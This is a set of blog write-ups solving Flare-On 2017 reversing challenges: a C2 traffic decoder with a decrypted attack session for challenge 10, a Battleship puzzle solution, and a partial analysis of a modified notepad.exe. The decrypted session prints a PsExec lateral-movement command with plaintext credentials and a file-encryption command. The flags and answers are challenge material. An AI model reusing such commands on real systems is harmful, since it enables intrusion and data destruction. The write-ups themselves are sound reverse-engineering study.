<span class="n">data</span> <span class="o">=</span> <span class="n">data</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s">":"</span><span class="p">,</span><span class="s">""</span><span class="p">)</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
<span class="k">if</span> <span class="n">data</span><span class="p">[:</span><span class="mi">4</span><span class="p">]</span> <span class="o">==</span> <span class="s">'2017'</span><span class="p">:</span>
<span class="n">mode</span> <span class="o">=</span> <span class="n">get_mode_by_ip</span><span class="p">(</span><span class="n">ip_src</span><span class="p">)</span>
<span class="n">collect</span> <span class="o">=</span> <span class="n">data</span>
<span class="n">header_len</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">collect</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mh">0xc</span><span class="p">])</span>
<span class="n">body_len</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">collect</span><span class="p">[</span><span class="mh">0xc</span><span class="p">:</span><span class="mh">0x10</span><span class="p">])</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">collect</span><span class="p">)</span> <span class="o">!=</span> <span class="p">(</span><span class="n">header_len</span><span class="o">+</span><span class="n">body_len</span><span class="p">)</span> <span class="ow">and</span> <span class="s">'2017'</span> <span class="ow">in</span> <span class="n">data</span><span class="p">:</span>
<span class="n">collect</span> <span class="o">+=</span> <span class="n">data</span><span class="p">[:</span><span class="n">data</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="s">'2017'</span><span class="p">)]</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="n">data</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="s">'2017'</span><span class="p">):]</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">collect</span> <span class="o">+=</span> <span class="n">data</span>
<span class="n">compile_data</span> <span class="o">=</span> <span class="n">collect</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">compile_data</span><span class="p">)</span> <span class="o">==</span> <span class="p">(</span><span class="n">header_len</span><span class="o">+</span><span class="n">body_len</span><span class="p">):</span>
<span class="n">decrypt_data</span> <span class="o">=</span> <span class="n">decrypt</span><span class="p">(</span><span class="n">compile_data</span><span class="p">)</span>
<span class="n">compile_data</span> <span class="o">=</span> <span class="s">''</span>
<span class="n">decompress_data</span> <span class="o">=</span> <span class="n">decompress</span><span class="p">(</span><span class="n">decrypt_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="n">plugin_cmd</span><span class="p">(</span><span class="n">decompress_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="k">except</span> <span class="nb">KeyError</span><span class="p">:</span>
<span class="k">pass</span>
<span class="k">return</span> <span class="mi">0</span>
<span class="k">def</span> <span class="nf">decode_stage3_client</span><span class="p">():</span>
<span class="k">print</span> <span class="s">"================================================================================"</span>
<span class="k">print</span> <span class="s">"============================= decode stage3 client ============================="</span>
<span class="k">print</span> <span class="s">"================================================================================"</span>
<span class="n">clientpacket</span> <span class="o">=</span> <span class="n">read_stage3_packet</span><span class="p">(</span><span class="s">'client2.bin'</span><span class="p">)</span>
<span class="n">mode</span> <span class="o">=</span> <span class="s">"CLIENT"</span>
<span class="k">while</span> <span class="n">clientpacket</span> <span class="o">!=</span> <span class="s">''</span><span class="p">:</span>
<span class="n">clientpacket</span> <span class="o">=</span> <span class="n">clientpacket</span><span class="p">[</span><span class="n">clientpacket</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="s">'2017'</span><span class="p">):]</span>
<span class="k">if</span> <span class="n">clientpacket</span><span class="p">[:</span><span class="mi">4</span><span class="p">]</span> <span class="o">==</span> <span class="s">'2017'</span><span class="p">:</span>
<span class="n">header_len</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">clientpacket</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mh">0xc</span><span class="p">])</span>
<span class="n">body_len</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">clientpacket</span><span class="p">[</span><span class="mh">0xc</span><span class="p">:</span><span class="mh">0x10</span><span class="p">])</span>
<span class="k">print</span> <span class="s">"---------------------------------------------------------------------"</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"["</span> <span class="o">+</span> <span class="n">mode</span> <span class="o">+</span> <span class="s">"]"</span><span class="p">,</span> <span class="s">'yellow'</span><span class="p">)</span>
<span class="n">decrypt_data</span> <span class="o">=</span> <span class="n">decrypt</span><span class="p">(</span><span class="n">clientpacket</span><span class="p">)</span>
<span class="n">decompress_data</span> <span class="o">=</span> <span class="n">decompress</span><span class="p">(</span><span class="n">decrypt_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="n">plugin_cmd</span><span class="p">(</span><span class="n">decompress_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="n">clientpacket</span> <span class="o">=</span> <span class="n">clientpacket</span><span class="p">[</span><span class="n">header_len</span> <span class="o">+</span> <span class="n">body_len</span><span class="p">:]</span>
<span class="k">def</span> <span class="nf">decode_stage3_server</span><span class="p">():</span>
<span class="k">print</span> <span class="s">"================================================================================"</span>
<span class="k">print</span> <span class="s">"============================= decode stage3 server ============================="</span>
<span class="k">print</span> <span class="s">"================================================================================"</span>
<span class="n">serverpacket</span> <span class="o">=</span> <span class="n">read_stage3_packet</span><span class="p">(</span><span class="s">'server2.bin'</span><span class="p">)</span>
<span class="n">mode</span> <span class="o">=</span> <span class="s">"SERVER"</span>
<span class="k">while</span> <span class="n">serverpacket</span> <span class="o">!=</span> <span class="s">''</span><span class="p">:</span>
<span class="n">serverpacket</span> <span class="o">=</span> <span class="n">serverpacket</span><span class="p">[</span><span class="n">serverpacket</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="s">'2017'</span><span class="p">):]</span>
<span class="k">if</span> <span class="n">serverpacket</span><span class="p">[:</span><span class="mi">4</span><span class="p">]</span> <span class="o">==</span> <span class="s">'2017'</span><span class="p">:</span>
<span class="n">header_len</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">serverpacket</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mh">0xc</span><span class="p">])</span>
<span class="n">body_len</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">serverpacket</span><span class="p">[</span><span class="mh">0xc</span><span class="p">:</span><span class="mh">0x10</span><span class="p">])</span>
<span class="k">print</span> <span class="s">"---------------------------------------------------------------------"</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"["</span> <span class="o">+</span> <span class="n">mode</span> <span class="o">+</span> <span class="s">"]"</span><span class="p">,</span> <span class="s">'cyan'</span><span class="p">)</span>
<span class="n">decrypt_data</span> <span class="o">=</span> <span class="n">decrypt</span><span class="p">(</span><span class="n">serverpacket</span><span class="p">)</span>
<span class="n">decompress_data</span> <span class="o">=</span> <span class="n">decompress</span><span class="p">(</span><span class="n">decrypt_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="n">plugin_cmd</span><span class="p">(</span><span class="n">decompress_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="n">serverpacket</span> <span class="o">=</span> <span class="n">serverpacket</span><span class="p">[</span><span class="n">header_len</span> <span class="o">+</span> <span class="n">body_len</span><span class="p">:</span> <span class="p">]</span>
<span class="c">####################################################################################################### </span>
<span class="n">decode_stage2_packet</span><span class="p">()</span>
<span class="n">decode_stage3_client</span><span class="p">()</span>
<span class="n">decode_stage3_server</span><span class="p">()</span>
</code></pre></div></div>
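<p>As an added example (not part of the original script), here is a Python 3 reassembler for the stage-2 framing the script above parses: every message starts with the marker <code class="highlighter-rouge">2017</code>, the u32 header length sits at offset 8 and the u32 body length at offset 0xc. It handles the cases that make the capture awkward: a frame split across TCP segments, two frames sharing one segment, the marker itself split across a segment boundary, and stray bytes before a marker. The little-endian byte order, the meaning of bytes 4..8, and the size sanity limit are assumptions.</p>

```python
import struct

MAGIC = b"2017"        # frame marker at the start of every stage-2 message (from the script)
HDR_LEN_OFF = 8        # u32 header length; the script reads collect[8:0xc]
BODY_LEN_OFF = 0xc     # u32 body length; the script reads collect[0xc:0x10]
FIXED_HDR = 0x10       # bytes that must be present before both lengths can be read
MAX_FRAME = 16 * 1024 * 1024   # assumed sanity limit; larger lengths are treated as garbage


def u32(b):
    """Little-endian unsigned 32-bit (assumed to match the script's u32 helper)."""
    return struct.unpack("<I", b[:4])[0]


class FrameReassembler:
    """Turns a stream of TCP payloads into complete (header, body) frames."""

    def __init__(self):
        self.buf = b""
        self.frames = []    # completed (header, body) tuples, in stream order
        self.discarded = 0  # bytes dropped while resynchronising on MAGIC

    def feed(self, payload):
        self.buf += payload
        while True:
            idx = self.buf.find(MAGIC)
            if idx < 0:
                # No marker yet: keep the last len(MAGIC)-1 bytes, because the
                # marker itself may be split across this and the next segment.
                keep = len(MAGIC) - 1
                drop = max(0, len(self.buf) - keep)
                self.discarded += drop
                self.buf = self.buf[drop:]
                return
            if idx > 0:
                # Bytes before the marker belong to nothing we can parse.
                self.discarded += idx
                self.buf = self.buf[idx:]
            if len(self.buf) < FIXED_HDR:
                return  # lengths not readable yet, wait for the next segment
            header_len = u32(self.buf[HDR_LEN_OFF:HDR_LEN_OFF + 4])
            body_len = u32(self.buf[BODY_LEN_OFF:BODY_LEN_OFF + 4])
            total = header_len + body_len
            if header_len < FIXED_HDR or total > MAX_FRAME:
                # Implausible lengths: this "2017" was not a real marker
                # (for example it occurred inside garbage); skip it and resync.
                self.discarded += len(MAGIC)
                self.buf = self.buf[len(MAGIC):]
                continue
            if len(self.buf) < total:
                return  # frame still incomplete
            frame, self.buf = self.buf[:total], self.buf[total:]
            self.frames.append((frame[:header_len], frame[header_len:]))


def build_frame(body, unknown=b"\x00" * 4):
    """Constructed test frame: MAGIC | 4 bytes of unknown meaning | header_len | body_len | body."""
    return MAGIC + unknown + struct.pack("<II", FIXED_HDR, len(body)) + body


def reassemble(segments):
    """Feed a list of TCP payloads and return (frames, discarded_byte_count)."""
    r = FrameReassembler()
    for seg in segments:
        r.feed(seg)
    return r.frames, r.discarded


if __name__ == "__main__":
    # Constructed stream: frame 1 split in two, its tail sharing a segment with
    # the first three bytes of frame 2 (so the marker "2017" is split), then
    # some leading junk before frame 3.
    f1 = build_frame(b"CRPT" + b"A" * 20)
    f2 = build_frame(b"COMP" + b"B" * 5)
    f3 = build_frame(b"CMD " + b"C" * 7)
    segs = [f1[:10], f1[10:] + f2[:3], f2[3:], b"junk" + f3]
    frames, dropped = reassemble(segs)
    for hdr, body in frames:
        print("header_len=%d body_len=%d body=%r" % (len(hdr), len(body), body))
    print("discarded bytes:", dropped)  # 4
```

The frames it yields are what the script hands to <code class="highlighter-rouge">decrypt</code> and <code class="highlighter-rouge">decompress</code>; the counter of discarded bytes is a cheap sanity check that a capture was not mis-framed.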
<hr />
<h2 id="附錄二-完整封包解密-還原-c2-server-與-client-的溝通過程">Appendix 2: Full packet decryption: reconstructing the communication between the C2 server and the client</h2>
<h3 id="client-封包解密">Client packet decryption</h3>
<ul>
<li>The malware logs in with the password <code class="highlighter-rouge">welcomepass1!1</code></li>
<li>The client downloads the <code class="highlighter-rouge">CRPT</code> module RC4</li>
<li>The client downloads the <code class="highlighter-rouge">CRPT</code> module simple substitution cipher</li>
<li>The client downloads the <code class="highlighter-rouge">CRPT</code> module CustomBase64</li>
<li>The client downloads the <code class="highlighter-rouge">CRPT</code> module XTEA</li>
<li>The client downloads the <code class="highlighter-rouge">COMP</code> module ZLib</li>
<li>The client downloads the <code class="highlighter-rouge">CMD</code> module File</li>
<li>Recover the client information</li>
</ul>
<table>
<thead>
<tr>
<th>Computer Info</th>
<th>context</th>
</tr>
</thead>
<tbody>
<tr>
<td>version</td>
<td>2.1.0</td>
</tr>
<tr>
<td>computer name</td>
<td>LARRYJOHNSON-PC</td>
</tr>
<tr>
<td>user name</td>
<td>larry.johnson</td>
</tr>
<tr>
<td>group name</td>
<td>feye2017 cli</td>
</tr>
</tbody>
</table>
<ul>
<li>Use the <code class="highlighter-rouge">File</code> module to list drives</li>
<li>Use the <code class="highlighter-rouge">File</code> module to list directories</li>
</ul>
<p><img src="https://i.imgur.com/NGvYpjp.png" alt="" /></p>
<ul>
<li>The client downloads the <code class="highlighter-rouge">CMD</code> module Shell</li>
<li>Use the <code class="highlighter-rouge">Shell</code> module to open a shell</li>
</ul>
<p><img src="https://i.imgur.com/RvZNVhk.png" alt="" /></p>
<p><img src="https://i.imgur.com/zjjxpE0.png" alt="" /></p>
<p><img src="https://i.imgur.com/C0u7Ktt.png" alt="" /></p>
<p><img src="https://i.imgur.com/chkwERs.png" alt="" /></p>
<p><img src="https://i.imgur.com/sEPWv91.png" alt="" /></p>
<ul>
<li>In <code class="highlighter-rouge">c:\work\FlareOn2017\Challenge_10 directory</code> there is a <code class="highlighter-rouge">TODO.txt</code> whose content is “Check with Larry about this.”</li>
<li>Create the directory <code class="highlighter-rouge">c:\staging</code></li>
<li>The client downloads the <code class="highlighter-rouge">CMD</code> module Screen</li>
<li>Recover the BMP image (8 bits)</li>
</ul>
<p><img src="https://i.imgur.com/TyWyjGv.png" alt="" /></p>
<ul>
<li>Obtain the zip password <code class="highlighter-rouge">infectedinfectedinfectedinfectedinfected919</code></li>
</ul>
<p><img src="https://i.imgur.com/AEatSSf.png" alt="" /></p>
<ul>
<li>Ping larryjohnson-pc and learn that its IP address is <code class="highlighter-rouge">192.168.221.105</code></li>
<li>Download <code class="highlighter-rouge">PsExec</code> to <code class="highlighter-rouge">c:\staging\pse.exe</code></li>
</ul>
<p><img src="https://i.imgur.com/KGhtpZh.png" alt="" /></p>
<p><img src="https://i.imgur.com/1V7NHSq.png" alt="" /></p>
<p><img src="https://i.imgur.com/3ThvPRq.png" alt="" /></p>
<ul>
<li>Download the server version of the malware, <code class="highlighter-rouge">srv2.exe</code>, to <code class="highlighter-rouge">c:\staging\srv2.exe</code></li>
</ul>
<p><img src="https://i.imgur.com/lQrGKT3.png" alt="" /></p>
<ul>
<li>Run the command <code class="highlighter-rouge">pse.exe \\larryjohnson-pc -i -c -f -d -u larry.johnson -p n3v3rgunnag1veUup -accepteula srv2.exe</code></li>
<li>The client downloads the <code class="highlighter-rouge">CMD</code> module Socket</li>
<li>srv2.exe starts listening on port 16452 on <code class="highlighter-rouge">larryjohnson-pc</code>
<ul>
<li>host: 192.168.221.105</li>
<li>port: 16452</li>
</ul>
</li>
<li>
<p>Collect the packets sent and received through the <code class="highlighter-rouge">CMD</code> module Socket
<img src="https://i.imgur.com/em5Gs5w.png" alt="" /></p>
</li>
<li>Close the socket</li>
</ul>
<h3 id="server-封包解密">Server packet decryption</h3>
<ul>
<li>The malware logs in with the password <code class="highlighter-rouge">welcomepass1!1</code></li>
<li>The client downloads the <code class="highlighter-rouge">CRPT</code> module Blowfish</li>
<li>The client downloads the <code class="highlighter-rouge">CRPT</code> module SimpleXOR</li>
<li>The client downloads the <code class="highlighter-rouge">CRPT</code> module DES3</li>
<li>The client downloads the <code class="highlighter-rouge">CRPT</code> module Camellia</li>
<li>The client downloads the <code class="highlighter-rouge">COMP</code> module ApLib</li>
<li>The client downloads the <code class="highlighter-rouge">COMP</code> module Lzo</li>
<li>Recover the server information</li>
</ul>
<table>
<thead>
<tr>
<th>Computer Info</th>
<th>context</th>
</tr>
</thead>
<tbody>
<tr>
<td>version</td>
<td>2.1.0</td>
</tr>
<tr>
<td>computer name</td>
<td>LARRYJOHNSON-PC</td>
</tr>
<tr>
<td>user name</td>
<td>larry.johnson</td>
</tr>
<tr>
<td>group name</td>
<td>feye2017 srv</td>
</tr>
</tbody>
</table>
<ul>
<li>Recover the BMP image (32 bits)</li>
</ul>
<p><img src="https://i.imgur.com/r8EByPw.png" alt="" /></p>
<ul>
<li>List Drive</li>
<li>List Directory</li>
</ul>
<p><img src="https://i.imgur.com/IskDDbE.png" alt="" /></p>
<p><img src="https://i.imgur.com/s0HX4EX.png" alt="" /></p>
<p><img src="https://i.imgur.com/xGd159p.png" alt="" /></p>
<p><img src="https://i.imgur.com/zvEPazD.png" alt="" /></p>
<ul>
<li>Create the folder <code class="highlighter-rouge">c:\staging</code></li>
<li>Send <code class="highlighter-rouge">cf.exe</code> to <code class="highlighter-rouge">c:\staging\cf.exe</code></li>
<li>Use <code class="highlighter-rouge">cf.exe</code> to encrypt lab10.zip into <code class="highlighter-rouge">lab10.zip.cry</code>; the command is <code class="highlighter-rouge">c:\staging\cf.exe lab10.zip tCqlc2+fFiLcuq1ee1eAPOMjxcdijh8z0jrakMA/jxg=</code></li>
</ul>
<p><img src="https://i.imgur.com/10L6gnw.png" alt="" /></p>
<ul>
<li>Delete <code class="highlighter-rouge">lab10.zip</code> and close the shell</li>
</ul>
<p><img src="https://i.imgur.com/3skXk3y.png" alt="" /></p>
2017 Flare-On Challenge 5 pewpewboat.exe
2018-05-24T00:00:00+00:00
http://0x00.tw/2018/05/24/2017 Flare-On #5 pewpewboat
<p>Actually, <code class="highlighter-rouge">pewpewboat.exe</code> is not a Windows PE file but an x64 ELF binary. When we launch the binary on Linux, we can see that it is a Battleship game.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Loading first pew pew map...
1 2 3 4 5 6 7 8
_________________
A |_|_|_|_|_|_|_|_|
B |_|_|_|_|_|_|_|_|
C |_|_|_|_|_|_|_|_|
D |_|_|_|_|_|_|_|_|
E |_|_|_|_|_|_|_|_|
F |_|_|_|_|_|_|_|_|
G |_|_|_|_|_|_|_|_|
H |_|_|_|_|_|_|_|_|
Rank: Seaman Recruit
Welcome to pewpewboat! We just loaded a pew pew map, start shootin'!
Enter a coordinate:
</code></pre></div></div>
<p>Let’s try typing some “coordinates” to see what happens. There are two possible results: <code class="highlighter-rouge">You missed :( </code> and <code class="highlighter-rouge">Nice shot! Hit!</code>. Once we have hit every coordinate we need, we get the message <code class="highlighter-rouge">sunk all the ships</code>.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 1 2 3 4 5 6 7 8
A |_|_|_|_|_|_|_|_|
B |_|_|_|X|X|X|X|_|
C |_|_|_|X|_|_|_|_|
D |_|_|_|X|_|_|_|_|
E |_|_|_|X|X|X|X|_|
F |_|_|_|X|_|_|_|_|
G |_|_|_|X|_|_|_|_|
H |_|_|_|_|_|_|_|_|
Rank: Seaman Recruit
Nice shot! Hit!
You sunk all the ships!!
NotMd5Hash("BNKM") >
</code></pre></div></div>
<p>Then we need to type something at the last line, <code class="highlighter-rouge">NotMd5Hash("BNKM") ></code>. After a few tries we can see that the letters inside the quotation marks are random, so we can patch the verification method in order to continue to the next game.</p>
<ul>
<li>Analysis:</li>
</ul>
<p>We can install the “gdbserver” tool on Ubuntu and bind it to <code class="highlighter-rouge">0.0.0.0</code>, so that we can debug the binary dynamically with IDA Pro.</p>
<p>The function at <code class="highlighter-rouge">0x403530</code> is <code class="highlighter-rouge">notmd5hash</code>; in this function we can find the prompt characters (built one at a time on the stack) and a call to <code class="highlighter-rouge">rand()</code>.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> v7 = 'N';
v8 = 'o';
v9 = 't';
v10 = 'M';
v11 = 'd';
v12 = '5';
v13 = 'H';
v14 = 'a';
v15 = 's';
v16 = 'h';
v17 = '(';
v18 = '"';
v19 = '%';
v20 = 's';
v21 = '"';
v22 = ')';
v23 = ' ';
v24 = '>';
v25 = ' ';
v26 = '\0';
</code></pre></div></div>
<p>After we patch the <code class="highlighter-rouge">call sub_403530</code> at <code class="highlighter-rouge">0x403BE0</code>, we can guess the coordinate positions more smoothly, or reverse the binary to find the correct coordinates.</p>
<ul>
<li>Solutions:</li>
</ul>
<p>I once also solved a challenge about a Battleship game; the challenge name was <a href="http://0x00.tw/2017/08/26/2017-HITCON-CMT-mini-wargame/">winmine.exe</a>, one of the challenges in the HITCON CMT 2017 mini wargame. At that time, I reversed the binary to find the correct coordinates. After the game, someone showed me a different solution, which I think is very interesting: using <a href="https://www.vmware.com/tw/products/workstation-pro.html">VMware Workstation snapshots</a> to remember the game screen that has already been marked.</p>
<p>We collect a letter every turn; when we have sunk all the ships, we get those letters from the game screen.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>F
H
G
U
Z
R
E
J
V
O
</code></pre></div></div>
<p>Reaching the final level, we get this message:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>You sunk all the ships!!
1 2 3 4 5 6 7 8
A |_|_|_|_|_|_|_|_|
B |_|_|_|_|_|_|_|_|
C |_|_|_|_|_|_|_|_|
D |_|_|_|_|_|_|_|_|
E |_|_|_|_|_|_|_|_|
F |_|_|_|_|_|_|_|_|
G |_|_|_|_|_|_|_|_|
H |_|_|_|_|_|_|_|_|
Rank: Congratulation!
Aye!PEWYouPEWfoundPEWsomePEWlettersPEWdidPEWya?PEWToPEWfindPEWwhatPEWyou'rePEWlookingPEWfor,PEWyou'llPEWwantPEWtoPEWre-orderPEWthem:PEW9,PEW1,PEW2,PEW7,PEW3,PEW5,PEW6,PEW5,PEW8,PEW0,PEW2,PEW3,PEW5,PEW6,PEW1,PEW4.
PEWNextPEWyouPEWletPEW13PEWROTPEWinPEWthePEWsea!PEWTHEPEWFINALPEWSECRETPEWCANPEWBEPEWFOUNDPEWWITHPEWONLYPEWTHEPEWUPPERPEWCASE.
Thanks for playing!
</code></pre></div></div>
<p>After we delete the “PEW” tokens, we get the real message.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Aye! You found some letters did ya? To find what you're looking for, you'll want to
re-order them:
9, 1, 2, 7, 3, 5, 6, 5, 8, 0, 2, 3, 5, 6, 1, 4.
Next you let 13 ROT in the sea! THE FINAL SECRET CAN BE FOUND WITH ONLY THE UPPER CASE.
Thanks for playing!
</code></pre></div></div>
<p>Following this message, we re-order the collected letters <code class="highlighter-rouge">FHGUZREJVO</code>. The result is <code class="highlighter-rouge">OHGJURERVFGUREHZ</code>. Next, ROT13 the string to get <code class="highlighter-rouge">BUTWHEREISTHERUM</code>.</p>
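<p>The three decoding steps above (strip the <code class="highlighter-rouge">PEW</code> filler, apply the re-order list, ROT13) as an added Python 3 example that is not part of the original write-up; the message text and the collected letters are copied from the game output above, and the regular expression that pulls the index list out of the message is an assumption about its layout.</p>

```python
import codecs
import re

# The final-level message as printed by the game (copied from the write-up, newline removed).
FINAL_MESSAGE = (
    "Aye!PEWYouPEWfoundPEWsomePEWlettersPEWdidPEWya?PEWToPEWfindPEWwhatPEWyou'rePEWlooking"
    "PEWfor,PEWyou'llPEWwantPEWtoPEWre-orderPEWthem:PEW9,PEW1,PEW2,PEW7,PEW3,PEW5,PEW6,PEW5,"
    "PEW8,PEW0,PEW2,PEW3,PEW5,PEW6,PEW1,PEW4.PEWNextPEWyouPEWletPEW13PEWROTPEWinPEWthePEWsea!"
    "PEWTHEPEWFINALPEWSECRETPEWCANPEWBEPEWFOUNDPEWWITHPEWONLYPEWTHEPEWUPPERPEWCASE."
)

# Letters collected one per level, in the order they were found (from the write-up).
COLLECTED = "FHGUZREJVO"


def strip_filler(msg, filler="PEW"):
    """The game inserted the filler where spaces belong, so turn each one back into a space."""
    return msg.replace(filler, " ")


def parse_order(clean_msg):
    """Extract the comma-separated index list that follows 're-order them:' (layout assumed)."""
    m = re.search(r"re-order them:\s*([\d,\s]+)\.", clean_msg)
    if m is None:
        raise ValueError("no re-order list in message")
    return [int(x) for x in m.group(1).split(",")]


def reorder(letters, order):
    """Build the new string; indices may repeat, so the output can be longer than the input."""
    bad = [i for i in order if i >= len(letters)]
    if bad:
        raise IndexError("indices %r exceed the %d collected letters" % (bad, len(letters)))
    return "".join(letters[i] for i in order)


def rot13(s):
    return codecs.encode(s, "rot_13")


def solve(msg=FINAL_MESSAGE, letters=COLLECTED):
    """Return (reordered, final) for the given message and collected letters."""
    order = parse_order(strip_filler(msg))
    reordered = reorder(letters, order)
    return reordered, rot13(reordered)


if __name__ == "__main__":
    reordered, final = solve()
    print("re-ordered:", reordered)  # OHGJURERVFGUREHZ
    print("ROT13     :", final)      # BUTWHEREISTHERUM
```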
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 1 2 3 4 5 6 7 8
A |_|_|_|_|_|_|_|_|
B |_|_|_|_|_|_|_|_|
C |_|_|_|_|_|_|_|_|
D |_|_|_|_|_|_|_|_|
E |_|_|_|_|_|_|_|_|
F |_|_|_|_|_|_|_|_|
G |_|_|_|_|_|_|_|_|
H |_|_|_|_|_|_|_|_|
Rank: Seaman Recruit
Welcome to pewpewboat! We just loaded a pew pew map, start shootin'!
Enter a coordinate: BUTWHEREISTHERUM
very nicely done! here have this key: y0u__sUnK_mY__P3Wp3w_b04t@flare-on.com
</code></pre></div></div>
<p>The flag is: <code class="highlighter-rouge">y0u__sUnK_mY__P3Wp3w_b04t@flare-on.com</code></p>
<hr />
<ul>
<li>Challenge Author: Tyler Dean (@spresec)</li>
<li><a href="https://github.com/0x000050/CTF/blob/master/2017_Flare-On/05_Pewpewboat/pewpewboat.exe">Challenge download</a></li>
</ul>
2017 Flare-On Challenge 4 Notepad.exe
2018-05-23T00:00:00+00:00
http://0x00.tw/2018/05/23/2017 Flare-On #4 notepad
<p><code class="highlighter-rouge">Notepad.exe</code> is a Windows x86 executable that appears to be a modified version of Microsoft’s <code class="highlighter-rouge">Notepad.exe</code>. When we launch the binary, nothing looks special.</p>
<p><img src="https://i.imgur.com/ZtdIJB9.png" alt="" /></p>
<ul>
<li>Analysis:</li>
</ul>
<p>IDA can apply Microsoft’s PDB for <code class="highlighter-rouge">Notepad.exe</code> from Microsoft’s symbol server, but the entry point of the executable has been modified to <code class="highlighter-rouge">0x1013a00</code>.</p>
<p><img src="https://i.imgur.com/6KjROey.png" alt="" /></p>
<p>Going to the function at <code class="highlighter-rouge">0x1013a00</code>, the interesting thing is that the entry point lies in the <code class="highlighter-rouge">.rsrc</code> section instead of the <code class="highlighter-rouge">.text</code> section. We also see an interesting string, <code class="highlighter-rouge">%USERPROFILE%\flareon2016challenge</code>, which hints that we will need the binaries from the 2016 Flare-On challenges (they can be downloaded from the <a href="http://www.flare-on.com/">official website</a>). Building strings on the stack like this is also a common malware technique.</p>
<p><img src="https://i.imgur.com/jWZce3e.png" alt="" /></p>
<p>Here we can restore these strings:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>%USERPROFILE%\flareon2016challenge
ImageHlp.dll
CheckSumMappedFile
User32.dll
MessageBoxA
</code></pre></div></div>
<p>We can get further strings from IDA’s “Strings window”:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>\\key.bin
%USERPROFILE%
\\flareon2016challenge
where's my key file?
what's wrong with my key file?
</code></pre></div></div>
<p>After that we see another malware technique: dynamically resolving library modules and functions. We can use IDA’s debugger to identify those libraries. This is the original decompiler output:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> v77 = 0x1013C4E;
v6 = sub_10153D0(0x8FECD63F);
v89 = sub_1015310(v6, 0x63D6C065);
v90 = sub_1015310(v6, 0xA5E1AC97);
v91 = sub_1015310(v6, 0x23545978);
v93 = sub_1015310(v6, 0x7C0017A5);
v94 = sub_1015310(v6, 0x56C61229);
v95 = sub_1015310(v6, 0x7B073C59);
v96 = sub_1015310(v6, 0xFFD97FB);
v109 = sub_1015310(v6, 0x10FA6516);
v97 = sub_1015310(v6, 0xE80A791F);
v98 = sub_1015310(v6, 0xDF7D9BAD);
v99 = sub_1015310(v6, 0xB12C56D7);
v100 = sub_1015310(v6, 0xEC0E4E8E);
v101 = sub_1015310(v6, 0x7C0DFCAA);
v103 = sub_1015310(v6, 0xD3324904);
v104 = sub_1015310(v6, 0xB2089259);
v105 = sub_1015310(v6, 0xEEB585D8);
v106 = sub_1015310(v6, 0x3810CB0F);
v107 = sub_1015310(v6, 0xF02A93BE);
v108 = sub_1015310(v6, 0xF72A53BA);
</code></pre></div></div>
<p>First, follow the first line, <code class="highlighter-rouge">v77 = 0x1013c4e</code>: <code class="highlighter-rouge">v77</code> stores the current <code class="highlighter-rouge">EIP</code>. Switching to the assembly view makes this clearer: the first instruction is <code class="highlighter-rouge">call $+5</code>, i.e. <code class="highlighter-rouge">$pc+5</code>. In IDA, <code class="highlighter-rouge">$</code> is the address of the current instruction (not <code class="highlighter-rouge">EIP</code>, which would point to the next instruction). <code class="highlighter-rouge">call $+5</code> therefore calls the very next instruction, and the following <code class="highlighter-rouge">pop</code> retrieves the pushed return address. This idiom is commonly used in position-independent shellcode to obtain the current EIP.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.rsrc:01013C49 call $+5 //$pc+5
.rsrc:01013C4E pop [ebp+var_88]
</code></pre></div></div>
<p>Using IDA’s debugger we can resolve the library and function names behind those hashes:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> v77 = 0x1013C4E; // $+5
user32.dll = sub_10153D0(0x8FECD63F);
kernel32_FindFirstFileA = sub_1015310(user32.dll, 0x63D6C065);
kernel32_FindNextFileA = sub_1015310(user32.dll, 0xA5E1AC97);
kernel32_FindClose = sub_1015310(user32.dll, 0x23545978);
kernel32_CreateFileA = sub_1015310(user32.dll, 0x7C0017A5);
kernel32_CreateFileMappingA = sub_1015310(user32.dll, 0x56C61229);
kernel32_MapViewOfFile = sub_1015310(user32.dll, 0x7B073C59);
kernel32_CloseHandle = sub_1015310(user32.dll, 0xFFD97FB);
